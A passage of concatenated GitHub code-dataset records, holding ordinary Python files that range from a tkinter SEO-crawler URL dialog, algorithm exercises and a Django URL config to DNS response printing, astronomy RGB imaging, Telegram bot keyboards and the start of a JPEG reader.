urllib.parse\n\n\nclass ListModeWindow(Toplevel):\n\n def __init__(self, crawler=None, crawl_tab=None, root=None):\n Toplevel.__init__(self)\n \n self.crawler = crawler\n self.crawl_tab = crawl_tab\n\n self.resizable(False, False)\n self.title(\"Greenflare SEO Crawler - List Mode Input URLs\")\n\n self.top_frame = ttk.Frame(self)\n self.top_frame.pack(anchor='center', padx=5, pady=5, fill='x')\n\n self.middle_frame = ttk.Frame(self)\n self.middle_frame.pack(anchor='center', padx=5, pady=5, fill='x')\n\n self.bottom_frame = ttk.Frame(self)\n self.bottom_frame.pack(anchor='center', padx=5, pady=5, fill='x')\n\n self.label_input = ttk.Label(\n self.top_frame, text=\"Enter or paste URLs to spider list crawl, one per line.\")\n self.label_input.pack(side=LEFT)\n\n self.url_input_field = Text(self.middle_frame)\n self.url_input_field.pack()\n\n self.list_crawl_btn = ttk.Button(\n self.bottom_frame, text=\"OK\", command=self.start_list_crawl)\n self.list_crawl_btn.pack(side=RIGHT)\n\n center_on_parent(self.master, self)\n\n def start_list_crawl(self):\n urls = self.url_input_field.get(\"1.0\", 'end-1c')\n 
urls = urls.splitlines()\n\n # Parse urls and only keep valid URLs\n urls = [u for u in urls if self.url_check(u) == True]\n\n # Dedupe URLs\n urls = list(set(urls))\n\n if len(urls) > 0:\n self.crawler.settings['MODE'] = 'List'\n self.crawler.list_mode_urls = urls\n self.crawl_tab.show_list_mode()\n self.destroy()\n messagebox.showinfo(title='Reading URLs completed', message=f'Loaded {len(urls)} valid and unique URLs!')\n else:\n messagebox.showerror(title='Reading URLs failed',\n message='No valid URLs found, please check your input!')\n\n def url_check(self, url):\n try:\n scheme, netloc, path, query, frag = urllib.parse.urlsplit(url)\n if all([scheme, netloc]):\n return True\n return False\n except:\n return False\n","repo_name":"beb7/gflare-tk","sub_path":"greenflare/widgets/listcrawl.py","file_name":"listcrawl.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"77"} +{"seq_id":"32285196359","text":"from typing import List\n\n\nclass Solution:\n def findCircleNum(self, isConnected: List[List[int]]) -> int:\n\n def dfs(pos: int) -> None:\n\n if visited[pos]:\n return\n\n visited[pos] = True\n\n for i in range(n):\n if isConnected[pos][i]:\n dfs(i)\n\n n = len(isConnected)\n\n visited = [False] * n\n\n res = 0\n\n for i in range(n):\n for j in range(n):\n\n if visited[i]:\n break\n\n if i == j:\n continue\n\n visited[i] = True\n if isConnected[i][j]:\n dfs(j)\n\n visited[i] = False\n\n if not visited[i]:\n res += 1\n\n visited[i] = True\n\n return res\n","repo_name":"Vortexx2/DSA-questions","sub_path":"leetcode/medium/547-num-provinces/dfs.py","file_name":"dfs.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"5396701606","text":"from matplotlib import pyplot as plt\nimport torch\n\nfrom src.data_preprocessing.load_dataset import BASE_DIR\nfrom src.data_preprocessing.load_dataset import test_loader\n\nMODEL_DIR = f'{BASE_DIR}src/experiments/colab/'\n\ndef predict_dabenet(device = torch.device(\"cuda:0\")):\n cnt = 0\n rows = 5\n columns = 3\n fig = plt.figure(figsize=(20, 20))\n best_model = torch.load(MODEL_DIR + 'out_model.pt')\n best_model.eval()\n\n for img, label in test_loader:\n cnt += 1\n\n #print(img[0].size())\n temp = img[0].swapaxes(0,1)\n temp = temp.swapaxes(1,2)\n fig.add_subplot(rows, columns, (cnt-1)*3+1)\n plt.imshow(temp)\n\n\n preds = best_model(img.to(device))\n preds = (preds > 0.5).float()\n temp2 = preds[0].swapaxes(0,1)\n temp2 = temp2.swapaxes(1,2)\n fig.add_subplot(rows, columns, (cnt-1)*3+2)\n plt.imshow(temp2[:,:,0].cpu().detach().numpy())\n\n temp1 = label[0].swapaxes(0,1)\n temp1 = temp1.swapaxes(1,2)\n fig.add_subplot(rows, columns, (cnt-1)*3+3)\n plt.imshow(temp1[:,:,0])\n\n if cnt == 5: break\n plt.show()","repo_name":"peswoccc/Building-Extraction","sub_path":"src/predict_dabenet.py","file_name":"predict_dabenet.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15893657267","text":"import sys\nsys.stdin = open(\"2382.txt\")\n\nfrom collections import deque\n\nT = int(input())\n\ndx = [-1,0,1,0]\ndy = [0,-1,0,1]\n\nfor tc in range(1,1+T):\n N,M,K = map(int, input().split())\n\n micro = [list(map(int, input().split())) for _ in range(K)]\n q = deque()\n\n board = [[0 for _ in range(N)] for _ in range(N)]\n\n for a in micro:\n y,x,n,dir = a\n if dir == 1:\n dir = 
1\n elif dir == 2:\n dir = 3\n elif dir == 3:\n dir = 0\n elif dir == 4:\n dir = 2\n\n board[y][x] = [[x,y,n,dir]]\n\n for time in range(M):\n\n for i in range(N):\n for j in range(N):\n if board[i][j]:\n n = 0\n max_n = 0\n dir = 0\n for inf in board[i][j]:\n n += inf[2]\n if max_n < inf[2] :\n max_n = inf[2]\n dir = inf[3]\n\n q.append([j,i,n,dir])\n board[i][j] = 0\n\n\n while q:\n t = q.popleft()\n x,y,n,dir = t\n\n nx, ny = x+dx[dir], y+dy[dir]\n\n if nx in [0,N-1] or ny in [0,N-1]:\n n = n//2\n dir = (dir+2)%4\n\n if board[ny][nx] == 0:\n board[ny][nx] = [[nx,ny,n,dir]]\n\n else:\n board[ny][nx].append([nx,ny,n,dir])\n\n\n ans = 0\n for i in range(N):\n for j in range(N):\n if board[i][j]:\n for inf in board[i][j]:\n ans += inf[2]\n print(\"#{} {}\" .format(tc, ans))\n","repo_name":"Nyapy/TIL","sub_path":"04_algorithm/SWExpertAcademy/2382미생물격리.py","file_name":"2382미생물격리.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"70531155128","text":"import csv\n\ncsv.field_size_limit(100000000)\n\nWEEKS = {\n 'P1', 'P2', 'P3', 'P4', 'P5', 'P6', 'P7',\n 'P8', 'P9', 'P10', 'P11', 'P12', 'P13', 'P14',\n 'P15', 'P16', 'P17', 'P18', 'P19', 'P20', 'P21',\n 'P22', 'P23', 'P24', 'P25', 'P26', 'P27', 'P28',\n 'P29', 'P30', 'P31', 'P32', 'P33', 'P34', 'P35',\n 'P36', 'P37', 'P38', 'P39', 'P40', 'B1', 'B2', 'B3',\n 'B4', 'B5', 'B6', 'B7', 'B8', 'B9', 'B10', 'B11', 'B12',\n 'B13', 'B14', 'B15', 'B16', 'B17', 'B18', 'B19', 'B20',\n 'B21', 'B22', 'B23', 'B24', 'B25', 'B26', 'B27', 'B28',\n 'B29', 'B30', 'B31', 'B32', 'B33', 'B34', 'B35', 'B36',\n 'B37', 'B38', 'B39', 'B40', 'B41', 'B42', 'B43', 'B44',\n 'B45', 'B46', 'B47', 'B48', 'B49', 'B50', 'B51', 'B52',\n 'B53', 'B54', 'B55', 'B56', 'B57', 'B58', 'B59', 'B60',\n 'B61', 'B62', 'B63', 'B64', 'B65', 'B66', 'B67', 'B68',\n 'B69', 'B70', 'B71', 'B72', 'B73', 'B74', 'B75', 'B76',\n 'B77', 'B78', 'B79', 'B80', 'B81', 'B82', 'B83', 'B84',\n 'B85', 'B86', 'B87', 'B88', 'B89', 'B90', 'B91', 'B92',\n 'B93', 'B94', 'B95', 'B96', 'B97', 'B98', 'B99', 'B100',\n 'B101', 'B102', 'B103', 'B104', 'B105',\n}\n\n\ndef tagging_file(file='', workdir='./', delimiter=';', quotechar='\\\"'):\n content = []\n with open(f'{workdir}/{file}') as csvfile:\n csv_reader = csv.reader(csvfile, delimiter=delimiter, quotechar=quotechar)\n content = [row for row in csv_reader]\n\n stages_uniq_array = {}\n stages_theme_uniq_array = {}\n bugs_report = []\n\n weeks_index = content[0].index('weeks') if 'weeks' in content[0] else -1\n stage_index = content[0].index('stage') if 'stage' in content[0] else -1\n stage_theme_index = content[0].index('stage_themes') if 'stage_themes' in content[0] else -1\n main_topic_index = content[0].index('main_topic') if 'main_topic' in content[0] else -1\n\n if 'servings' in content[0]:\n content[0][content[0].index('servings')] = 'serving'\n\n if 'id' in content[0]:\n content[0][content[0].index('id')] = 'id_d8'\n\n def change_delimiter(index, row):\n if row.find(',') != -1 or row.find(';') != -1 or row.find('.') != -1:\n\n if row.find(',') != -1:\n row = row.replace(',', '|')\n\n if row.find(';') != -1:\n row = row.replace(';', '|')\n\n if row.find('.') != -1:\n row = row.replace('.', '|')\n\n bugs_report.append(f'On line {index} delimiter problem')\n\n row = '|'.join([item.strip() for item in row.split('|')])\n return row\n return row\n\n for index, row in enumerate(content[1::]):\n if index != 0:\n\n if main_topic_index != -1:\n row[main_topic_index] 
= change_delimiter(index, row[main_topic_index])\n\n if weeks_index != -1:\n weeks_item = change_delimiter(index, row[weeks_index])\n weeks_arr = [item for item in weeks_item.split('|') if item not in WEEKS and item != '']\n if len(weeks_arr) > 0:\n row[weeks_index] = '|'.join([item for item in weeks_item.split('|') if item not in weeks_arr])\n bugs_report.append('New element(s): [' + ', '.join(weeks_arr) + f'] on line {index}')\n else:\n row[weeks_index] = weeks_item\n\n if stage_index != -1:\n row[stage_index] = change_delimiter(index, row[stage_index])\n stages_arr = row[stage_index].split('|')\n\n # iterate over a copy: the loop removes/appends items\n for i in stages_arr[:]:\n if i.lower() not in stages_uniq_array:\n stages_uniq_array[i.lower()] = i\n else:\n if stages_uniq_array[i.lower()] != i:\n stages_arr.remove(i)\n stages_arr.append(stages_uniq_array[i.lower()])\n\n row[stage_index] = '|'.join(stages_arr)\n\n if stage_theme_index != -1:\n row[stage_theme_index] = change_delimiter(index, row[stage_theme_index])\n stages_theme_arr = row[stage_theme_index].split('|')\n\n # iterate over a copy: the loop removes/appends items\n for i in stages_theme_arr[:]:\n if i.lower() not in stages_theme_uniq_array:\n stages_theme_uniq_array[i.lower()] = i\n else:\n if stages_theme_uniq_array[i.lower()] != i:\n stages_theme_arr.remove(i)\n stages_theme_arr.append(stages_theme_uniq_array[i.lower()])\n\n row[stage_theme_index] = '|'.join(stages_theme_arr)\n\n with open(f'{workdir}/NEW_{file}', 'w+') as file:\n file_writer = csv.writer(file, delimiter=\";\", lineterminator=\"\\n\", quotechar='\"')\n for row in content:\n file_writer.writerow(row)\n\n\n report = '\\t'.join(bugs_report)\n print(report)\n\ntagging_file('tagging_article.csv', '/home/zazulnitski/Загрузки')\n# tagging_file('tagging_recipe.csv', '/home/zazulnitski/Загрузки')\n# tagging_file('tagging_product.csv', '/home/zazulnitski/Загрузки')\n","repo_name":"zazulnitski-dev/babyme","sub_path":"tagginTool.py","file_name":"tagginTool.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11516623721","text":"\"\"\"sportshop URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.contrib.auth.models import Group\nfrom django.urls import path, include\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom shop.views import redirect_home\nfrom social_django.models import Association, Nonce, UserSocialAuth\nfrom cart.models import Cart, CartItem\n\n\nurlpatterns = [\n path('admin/', include('admin_black.urls')),\n path('admin/', admin.site.urls),\n path('account/', include('account.urls')),\n path('social-auth/', include('social_django.urls', namespace='social')),\n path('shop/', include('shop.urls', namespace='shop')),\n path('cart/', include('cart.urls', namespace='cart')),\n path('orders/', include('orders.urls', namespace='orders')),\n path('', redirect_home),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nadmin.site.unregister(Group)\nadmin.site.unregister(Association)\nadmin.site.unregister(Nonce)\nadmin.site.unregister(UserSocialAuth)\nadmin.site.unregister(Cart)\nadmin.site.unregister(CartItem)\nadmin.site.site_header = 'Sporty Admin Panel'\nadmin.site.site_title = 'Sporty Admin'\nadmin.site.index_title = 'Sporty Admin'","repo_name":"wongcheehong/Django-Ecommerce-FYP","sub_path":"sportshop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6116421816","text":"#Ex 90:Faça um programa que leia o nome e a média de um aluno, guardando também a situação em um dicionário. No final mostre o\r\n#conteúdo da estrutura na tela.\r\nestudante = {}\r\nestudante['Aluno'] = input('Nome do aluno: ')\r\nestudante['Média'] = int(input(f'Média de {estudante[\"Aluno\"]}: '))\r\nif estudante['Média'] >= 7:\r\n estudante['Situação'] = 'Aprovado'\r\nelse:\r\n estudante['Situação'] = 'Reprovado'\r\nfor k, v in estudante.items():\r\n print(f'{k} é igual a {v}')\r\n\r\n#Ex 91: Crie um programa onde 4 jogadores joguem um dado e tenham resultados aleatórios. Guarde esses resultados em um dicionário.\r\n#No final coloque esse dicionário em ordem sabendo que o vencedor foi aquele que tirou o maior número.\r\nfrom random import randint\r\nfrom operator import itemgetter\r\njogadores = {'jogador1': randint(1, 6), 'jogador2': randint(1, 6), 'jogador3': randint(1, 6), 'jogador4': randint(1, 6)}\r\nprint('Valores Sorteados:')\r\nfor k,v in jogadores.items():\r\n print(f'O {k} tirou {v} no dado')\r\nranking = []\r\nranking = sorted(jogadores.items(), key=itemgetter(1), reverse=True)\r\nprint('Ranking dos jogadores')\r\nfor i, v in enumerate(ranking):\r\n print(f'{i+1}º lugar: {v[0]} com {v[1]}')\r\n\r\n#Ex 92: Crie um programa que leia nome, ano de nascimento e carteira de trabalho e cadastre-os (com idade) em um dicionário.\r\n# Se a CTPS for diferente de zero, o dicionário receberá tembém o ano de contratação e o salário. Calcule e acrescente além\r\n# da idade, com quantos anos a pessoa vai se aposentar.\r\nfrom datetime import datetime\r\npessoa = {}\r\npessoa['Nome'] = input('Nome: ')\r\nnascimento = int(input('Ano de nascimento: '))\r\npessoa['Idade'] = datetime.now().year - nascimento\r\npessoa['CTPS'] = int(input('Nº carteira de trabalho:[0] caso não tenha. 
'))\r\nif pessoa['CTPS'] != 0:\r\n pessoa['Ano de contratação'] = int(input('Ano de contratação: '))\r\n pessoa['Salário'] = int(input('Salário: '))\r\n pessoa['Aposentadoria'] = pessoa['Ano de contratação'] + 40\r\nfor k, v in pessoa.items():\r\n print(f'{k} tem o valor {v}.')\r\n\r\n#Ex 93:Crie um programa que gerencie o aproveitamento de um jogo de futebol. O programa vai ler o nome do jogador e quantas\r\n#partidas ele jogou. Depois vai ler a quantidade de gols feita em cada partida. No final tudo isso será guardado em um\r\n#dicionário, incluindo o total de gols feitos durante o campeonato.\r\njogador = {}\r\ngols = []\r\njogador['nome'] = input('Nome: ')\r\njogador['gols'] = int(input('Nº partidas: '))\r\nfor c in range(1, jogador['gols'] + 1):\r\n gols.append(int(input(f'Quantos gols na partida {c} ')))\r\njogador['total de gols'] = sum(gols)\r\njogador['gols'] = gols\r\nprint(jogador)\r\nfor k,v in jogador.items():\r\n print(f'O campo {k} tem o valor {v}')\r\nprint(f'O jogador {jogador[\"nome\"]} jogou {len(gols)} partidas.')\r\nfor c,v in enumerate(gols):\r\n print(f'Na partida {c + 1} foram {v} gols')\r\nprint(f'Foi um total de {sum(gols)} gols.')\r\n\r\n#Ex 94: Crie um programa que leia o nome, idade e sexo de várias pessoas. Guardando os dados de cada pessoa em um dicionário\r\n#e todos os dicionários em uma lista. No final mostre: Quantas pessoas foram cadastradas, a média de idade do grupo, uma lista\r\n#com todas as mulheres, uma lista com todas as pessoas com idade acima da média.\r\npessoas = []\r\ndados = {}\r\nidades = []\r\nwhile True:\r\n dados.clear()\r\n dados['Nome'] = input('Nome: ')\r\n dados['Idade'] = int(input('Idade: '))\r\n idades.append(dados['Idade'])\r\n dados['Sexo'] = input('Sexo: ').upper()\r\n pessoas.append(dados.copy())\r\n resposta = input('Quer continuar?[S/N] ')\r\n if resposta in 'Nn':\r\n break\r\nmédiaidades = sum(idades) / len(idades)\r\nprint(f'Foram cadastradas {len(pessoas)} pessoas.')\r\nprint(f'A média de idades é {médiaidades:.1f}.')\r\nprint(f'As mulheres cadastradas foram', end=' ')\r\nfor c in pessoas:\r\n if c['Sexo'] == 'F':\r\n print(f'{c[\"Nome\"]}')\r\nprint()\r\nfor c in pessoas:\r\n if c['Idade'] > médiaidades:\r\n print(f'Acima da média estão {c[\"Nome\"]}')\r\n\r\n#Ex 95: Aprimore o desafio 93 para que ele funcione com vários jogadores, incluindo um sistema de visualização de detalhes\r\n#de aproveitamento de cada jogador.\r\ndado=dict()\r\nt=[]\r\nw=[]\r\nn=[]\r\nwhile True:\r\n dado.clear()\r\n dado[\"nome\"]=str(input('digite o nome do jogador: '))\r\n j=int(input('quantas partidas o {} jogo?: '.format(dado[\"nome\"])))\r\n n.clear()\r\n for i in range(j):\r\n n.append(int(input('quantos gols foi feito na partida {}: '.format(i))))\r\n dado[\"gols\"] = n[:]\r\n dado[\"total\"] = sum(n)\r\n w.append(dado.copy())\r\n n2=str(input(\"quer continuar?\")).upper().strip()[0]\r\n while n2 not in \"NnSs\":\r\n print('resposta invalida,digite novamnete ')\r\n n2=str(input(\"quer continuar?\")).upper().strip()[0]\r\n if n2 in \"Nn\":\r\n break\r\nprint('',end='')\r\nfor i in dado.keys():\r\n print('{:<15}'.format(i), end=' ')\r\nprint()\r\nfor k,v in enumerate(w):\r\n print('{:>2} '.format(k), end='')\r\n for d in v.values():\r\n print('{:<15}'.format(str(d)),end=' ')\r\n print()\r\nwhile True:\r\n n3=int(input('digite o numero do jogador,(999 para sair): '))\r\n if n3 == 999:\r\n break\r\n if n3>len(w):\r\n print('não tem esse numero')\r\n for h,q in enumerate(w):\r\n if h==n3:\r\n print('levatamento dos do jogador 
{}'.format(h))\r\n print('nome:{} '.format(h,q[\"nome\"]))\r\n","repo_name":"guilhermegssilva/Practice","sub_path":"Conteúdos Diversos/Python/Curso em Vídeo/10.1 Exercícios Dicionários.py","file_name":"10.1 Exercícios Dicionários.py","file_ext":"py","file_size_in_byte":5402,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40887412978","text":"\nclass Response:\n\n def __init__(self):\n self.id = None\n self.auth = None\n self.type = []\n self.name = None\n self.ttl = []\n self.answer = []\n self.additional = []\n self.num_answers = 0\n self.num_additional = 0\n \n def display_response(self):\n index = 0 # keep track of index in ttl and type\n if self.num_answers != 0:\n print(\"\\n***Answer Section (\" + str(self.num_answers) + \" records)***\\n\")\n # Goes through all answers, formats them appropriately and prints the lines\n for answer in self.answer:\n if self.type[index] == 1 or self.type[index] == 2 or self.type[index] == 5 or self.type[index] == 15:\n response = \"\"\n if self.type[index] == 1:\n response += \"IP\\t\"\n elif self.type[index] == 2:\n response += \"NS\\t\"\n elif self.type[index] == 5:\n response += \"CNAME\\t\"\n else:\n response += \"MX\\t\"\n \n response += answer + \"\\t\"\n response += str(self.ttl[index]) + \"\\t\"\n\n if self.auth == '1':\n response += \"auth\"\n else:\n response += \"nonauth\"\n \n print(response)\n index += 1\n \n add_responses = []\n # Goes through all additional records and formats them appropriately\n # Filters out the non-compatible records\n for additional in self.additional:\n if self.type[index] == 1 or self.type[index] == 2 or self.type[index] == 5 or self.type[index] == 15:\n response = \"\"\n if self.type[index] == 1:\n response += \"IP\\t\"\n elif self.type[index] == 2:\n response += \"NS\\t\"\n elif self.type[index] == 5:\n response += \"CNAME\\t\"\n else:\n response += \"MX\\t\"\n \n response += additional + \"\\t\"\n response += str(self.ttl[index]) + \"\\t\"\n\n if self.auth == '1':\n response += \"auth\"\n else:\n response += \"nonauth\"\n \n add_responses.append(response)\n else:\n self.num_additional -= 1\n index += 1\n \n if self.num_additional != 0:\n print(\"\\n***Additional Section (\" + str(self.num_additional) + \" records)***\\n\")\n \n # prints all the appropriate additional records\n for additional in add_responses:\n print(additional)\n \n print(\"\\n\")\n \n\n\n ","repo_name":"amanijam/ECSE316_A1","sub_path":"response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14681580812","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 25 14:16:04 2021\n\nMake RGB Images\n\n@author: Rohit\n@modified by: Parichay\n\"\"\"\n\nimport aplpy\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nrgb_path = \"/home/pmazumdar/Documents/LASMA/Reduction/class_maps/temp/\"\nplot_path = \"/home/pmazumdar/Documents/LASMA/G305 Papers/Paper 2/\"\n\naplpy.make_rgb_cube([rgb_path+'G305-MSX-21-reproject.fits', \\\n rgb_path+'G305-GLM-8-reproject.fits', \\\n rgb_path+'G305-HPACS-70-reproject.fits'],\\\n rgb_path+'G305_rgb.fits', north=False)\n\naplpy.make_rgb_image(rgb_path+'G305_rgb.fits', rgb_path+'example_cube.eps',\n vmin_r=-1e-6, vmax_r=4.5e-5, stretch_r='linear',\n vmin_g=70, vmax_g=550, stretch_g='sqrt',\n vmin_b=0.3, vmax_b=2, 
stretch_b='log')\n\n###############################################################################################\n\naplpy.make_rgb_cube([rgb_path+'G305-MSX-21-reproject.fits', \\\n rgb_path+'G305-GLM-8-reproject.fits', \\\n rgb_path+'G305_13CO_mom_0.fits'],\\\n rgb_path+'G305_rgb_13CO.fits', north=False)\n\naplpy.make_rgb_image(rgb_path+'G305_rgb_13CO.fits', rgb_path+'example_cube_13CO.eps',\n vmin_r=-1e-6, vmax_r=4.5e-5, stretch_r='linear',\n vmin_g=70, vmax_g=550, stretch_g='sqrt',\n vmin_b=0.5, vmax_b=45, stretch_b='sqrt')\n\nplt.rcParams.update({'font.size':12})\n\nFrgb = aplpy.FITSFigure(rgb_path+'G305_rgb_13CO_2d.fits')\nFrgb.show_rgb(rgb_path+'example_cube_13CO.eps')\n\nx_Danks = np.array([305.3384,305.3934])\ny_Danks = np.array([+00.0719,+00.0874])\nradii_Danks = np.array([0.018,0.026])\nFrgb.show_circles(x_Danks,y_Danks,radius=radii_Danks,edgecolor='white',facecolor='none',linewidths=1)\n\nx_wr48 = 305.361\ny_wr48 = +00.056\n\nFrgb.show_markers(x_wr48,y_wr48,edgecolor='white',marker='*', facecolor='none',s=100,linewidth=1)\n\nFrgb.savefig(plot_path+'G305_RGB.eps')\n#Frgb.savefig(plot_path+'G305_RGB.png',dpi=400)\n\n### Test RGB Range: ##########################################################################\n \nFr = aplpy.FITSFigure(rgb_path+'G305-MSX-21-reproject.fits')\nFr.show_colorscale(vmin=0.00001,vmax=0.000175, stretch='log')\nFr.add_colorbar()\n\nFg = aplpy.FITSFigure(rgb_path+'G305-GLM-8-reproject.fits')\nFg.show_colorscale(vmin=70,vmax=600,stretch='log')\nFg.add_colorbar()\n\nFb = aplpy.FITSFigure(rgb_path+'G305-HPACS-70-reproject.fits')\nFb.show_colorscale(vmin=0.5,vmax=7,stretch='log')\nFb.add_colorbar()\n\n\n","repo_name":"mazpar/G305-paper-2","sub_path":"make_rgb_plots.py","file_name":"make_rgb_plots.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"899131782","text":"import csv\r\nimport sqlcplants\r\n\r\nclass Language:\r\n def __init__(self, lang):\r\n self.lang = lang\r\n self.dict = {}\r\n if self.lang != \"en\":\r\n self.read_dict_from_csv()\r\n self.read_dict_from_db()\r\n\r\n def read_dict_from_csv(self):\r\n with open(f\"{self.lang}.csv\", newline='', encoding='utf-8') as csvfile:\r\n reader = csv.reader(csvfile, delimiter=';')\r\n for row in reader:\r\n self.dict[row[0]] = row[1]\r\n\r\n def read_dict_from_db(self):\r\n dict2 = sqlcplants.getDictionary()\r\n self.dict.update(dict2)\r\n\r\n def get(self, key):\r\n if self.lang != \"en\":\r\n val = self.dict.get(key)\r\n if val == None:\r\n val = \"*\" + key\r\n else:\r\n val = key\r\n return val\r\n\r\n def rget(self, value):\r\n #print(\"value in rget:\"+value)\r\n if self.lang != \"en\":\r\n for k, v in self.dict.items():\r\n if v == value:\r\n return k\r\n return \"*\" + value\r\n else:\r\n return value\r\n\r\n","repo_name":"RPDaniels/CPlant","sub_path":"langmgr.py","file_name":"langmgr.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"22946363829","text":"from aiogram.types import InlineKeyboardMarkup, InlineKeyboardButton\r\n\r\nfrom keyboards.inline.callBackData import global_callback\r\n\r\nmanzillar = {\r\n \"Toshkent\": \"Tashkent\",\r\n \"London\": \"London\",\r\n \"Washington\": \"Washington\",\r\n \"Istanbul\": \"Istanbul\",\r\n \"Tokio\": \"Tokio\",\r\n \"Moskva\": \"Moskow\",\r\n}\r\n\r\n#manzil inline keyboard\r\nglobalChiptaKetmoqMenu = 
InlineKeyboardMarkup(row_width=2)\r\nglobalChiptaManzilMenu = InlineKeyboardMarkup(row_width=2)\r\n\r\nfor key, value in manzillar.items():\r\n globalChiptaKetmoqMenu.insert(InlineKeyboardButton(text=key, callback_data=global_callback.new(value+\"_k\")))\r\n globalChiptaManzilMenu.insert(InlineKeyboardButton(text=key, callback_data=global_callback.new(value)))\r\n\r\nback = InlineKeyboardButton(text=\"🔙 Orqaga\", callback_data='g_cancel')\r\nback_k = InlineKeyboardButton(text=\"🔙 Orqaga\", callback_data='g_cancel_k')\r\nglobalChiptaKetmoqMenu.insert(back_k)\r\nglobalChiptaManzilMenu.insert(back)","repo_name":"RahimovIlhom/Avia-chipta-bot","sub_path":"keyboards/inline/glocalChiptaKeyboards.py","file_name":"glocalChiptaKeyboards.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"14549082167","text":"\"\"\"\nMamy pewien układ klocków domino. Otrzymujemy go w postaci listy par [a, b]: Jeżeli przewrócimy klocek a, to klocek b\nteż się przewróci. Chcemy znaleźć minimalną liczbę klocków, które trzeba przewrócić ręcznie, aby wszystkie domina były\nprzewrócone.\n\"\"\"\n\"\"\"\nbuduje graf, puszczam sobie dfs, i w klockach przewróconych przesz inne klocki zazanzczam w tablicy jako True \n, pote zliczam ile nie zostalo przewroconych przez inne i to jest moja minimalna liczba\n\"\"\"\n\n\ndef DFS_visit(G, u, visited, parent, flipped):\n visited[u] = True\n for v in G[u]:\n if not visited[v]:\n flipped[v] = True\n parent[v] = u\n DFS_visit(G, v, visited, parent, flipped)\n\n\ndef DFS(G):\n visited = [False for _ in range(len(G))]\n flipped = [False for _ in range(len(G))]\n parent = [-1 for _ in range(len(G))]\n for u in range(len(G)):\n if not visited[u]:\n DFS_visit(G, u, visited, parent, flipped)\n return flipped\n\n\ndef make_graph(dominos):\n max_size = -1\n for i in range(len(dominos)):\n if max_size < dominos[i][0]:\n max_size = dominos[i][0]\n elif max_size < dominos[i][1]:\n max_size = dominos[i][1]\n\n new_graph = [[] for _ in range(max_size+2)]\n for i in range(len(dominos)):\n new_graph[dominos[i][0]].append(dominos[i][1])\n\n return new_graph\n\n\ndef count_flips(dominos):\n graph = make_graph(dominos)\n flipped = DFS(graph)\n counter = 0\n\n for i in range(len(flipped)):\n if flipped[i] is not True:\n counter += 1\n\n return counter\n\n\ndominos = [[2, 3], [3, 5], [6, 7], [7, 8], [8, 10], [11, 13], [14, 15], [9, 12], [2, 4], [3, 9]]\ndominos1 = [[2, 3], [3, 5], [6, 7], [7, 8], [8, 10], [11, 13], [14, 15]]\nprint(count_flips(dominos1))","repo_name":"pvtrov/algorithms-and-data-structures","sub_path":"exercises_from_course/excercises_from_bit_/graphs/2_4_dominos.py","file_name":"2_4_dominos.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"pl","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"24835596506","text":"import os\nfrom huffman import HuffmanTree\nimport math\nimport numpy as np\nfrom scipy import fftpack\nfrom PIL import Image\n\n\nclass JPEGFileReader:\n\tTABLE_SIZE_BITS = 16\n\tBLOCKS_COUNT_BITS = 32\n\tDC_CODE_LENGTH_BITS = 4\n\tCATEGORY_BITS = 4\n\tAC_CODE_LENGTH_BITS = 8\n\tRUN_LENGTH_BITS = 4\n\tSIZE_BITS = 4\n\n\tdef __init__(self, filepath):\n\t\tself.__file = open(filepath, 'r')\n\n\tdef read_int(self, size):\n\t\tif size == 0:\n\t\t\treturn 0\n\t\tbin_num = self.__read_str(size)\n\t\tif bin_num[0] == '1':\n\t\t\treturn self.__int2(bin_num)\n\t\telse:\n\t\t\treturn self.__int2(binstr_flip(bin_num)) * -1\n\n\tdef 
